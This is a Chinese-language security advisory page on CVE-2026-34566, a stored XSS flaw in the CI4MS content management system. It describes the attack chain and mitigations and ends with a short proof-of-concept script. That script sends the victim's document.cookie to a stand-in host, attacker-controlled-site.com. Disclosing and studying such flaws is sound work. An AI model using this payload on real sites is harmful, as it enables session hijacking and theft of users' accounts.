CVE-2026-34566 CVSS 9.1 严重

CVE-2026-34566 CI4MS 存储型XSS漏洞

披露日期: 2026-04-01

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-34566

漏洞类型

存储型XSS

CVSS评分

9.1 严重

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

CI4MS

漏洞概述

CI4MS是一款基于CodeIgniter 4的CMS系统。在0.31.0.0版本之前，其在页面管理功能中存在严重的安全缺陷。系统未能正确清理用户在创建或编辑页面时提交的输入数据，导致攻击者可注入恶意JavaScript代码。这些载荷被存储在服务器端后，当管理员或普通用户浏览相关页面时，恶意代码会在其浏览器中执行，造成存储型XSS攻击。该漏洞已在最新版本中得到修复。

技术细节

该漏洞属于存储型DOM-based XSS，主要根源于CI4MS在页面管理模块中缺乏对用户输入的严格净化机制以及对输出数据的编码保护。在攻击利用阶段，拥有低权限账户的攻击者可以通过页面创建或编辑接口，在受影响的输入字段中注入精心构造的JavaScript恶意载荷。由于服务器端未对输入内容进行充分的安全过滤，这些恶意代码被持久化存储在后端数据库中。漏洞的触发发生在数据回显阶段，当管理员查看后台页面列表或普通用户访问受到感染的公开页面时，应用程序会将未经过滤的恶意脚本直接返回给客户端。由于缺乏适当的输出编码，受害者浏览器解析DOM时将执行这些脚本。攻击者可借此窃取敏感信息（如Session ID）、执行未授权操作或进行钓鱼攻击。

攻击链分析

STEP 1

1. 访问与认证

攻击者使用低权限账户登录CI4MS系统，获取对页面管理功能的访问权限。

STEP 2

2. 注入Payload

攻击者在创建或编辑页面时，向未经过滤的输入字段中输入恶意的JavaScript代码。

STEP 3

3. 持久化存储

系统将包含恶意脚本的页面数据保存到服务器数据库中，未进行适当的清理。

STEP 4

4. 触发漏洞

当管理员访问后台页面列表或普通用户访问受影响的公共页面时，服务器加载并渲染恶意数据。

STEP 5

5. 执行攻击

受害者浏览器解析未编码的响应，执行恶意脚本，导致Cookie被盗或会话被劫持。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- Simple PoC for Stored XSS in Page Management -->
<script>
  // Demonstrate execution
  alert('CVE-2026-34566: Stored XSS Executed');
  
  // Exfiltrate document cookie
  var img = new Image();
  img.src = "http://attacker-controlled-site.com/log?c=" + encodeURIComponent(document.cookie);
</script>

影响范围

CI4MS < 0.31.0.0

防御指南

临时缓解措施

如果无法立即升级，建议限制对页面管理功能的访问权限，仅允许受信任的管理员IP访问。同时，部署Web应用防火墙（WAF）以检测和拦截常见的XSS攻击向量，并对输出页面进行临时的编码修复。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表